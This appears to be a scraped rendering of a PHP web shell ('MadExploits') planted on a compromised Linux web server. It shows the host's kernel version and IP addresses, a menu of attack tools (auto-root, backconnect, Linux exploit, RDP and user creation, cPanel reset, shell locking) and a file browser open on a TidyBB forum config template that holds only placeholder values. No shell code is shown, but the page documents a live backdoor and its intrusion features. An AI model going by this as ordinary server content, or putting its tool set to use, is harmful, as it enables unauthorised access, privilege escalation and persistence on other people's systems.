Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.189.143.150
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
layerbb /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
4.39
KB
-rw-r--r--
config.php
1.12
KB
-rw-r--r--
edit.php
4.47
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
10.07
KB
-rw-r--r--
fileindex.php
276
B
-rw-r--r--
import.php
3.16
KB
-rw-r--r--
info.xml
1.96
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
4.15
KB
-rw-r--r--
install.xml
1.59
KB
-rw-r--r--
md5
12
KB
-rw-r--r--
notes.txt
126
B
-rw-r--r--
update_pass.php
605
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php //===================================// // TidyBB Project // //-----------------------------------// // Website: https://www.tidybb.co.uk // // Email: info@tidynode.co.uk // // Build Series: 1.1 // //===================================// if (!defined('BASEPATH')) { die(); } /* * TidyBB Configuration File. */ define('MYSQL_HOST', '[[softdbhost]]'); define('MYSQL_USERNAME', '[[softdbuser]]'); define('MYSQL_PASSWORD', '[[softdbpass]]'); define('MYSQL_DATABASE', '[[softdb]]'); define('MYSQL_PREFIX', '[[dbprefix]]'); define('MYSQL_PORT', 3306); /* * Local Details */ define('SITE_URL', '[[softurl]]');//Without the ending "/" define('SITE_PATH', '[[softpath]]'); // Without the ending "/" define('TidyBB_VERSION', '1.1.6'); define('TIDY_SESSION_TIMEOUT', 31536000);//In seconds. define('USER_PASSWORD_HASH_COST', 10); /* * Usergroup Details. * DO NOT CHANGE IF YOU DON'T KNOW WHAT THIS WILL DO. */ define('ADMIN_ID', '4'); define('MOD_ID', '3'); define('BAN_ID', '2'); /* * Forum Configuration. */ define('THREAD_RESULTS_PER_PAGE', 12); define('POST_RESULTS_PER_PAGE', 9); ?>
Close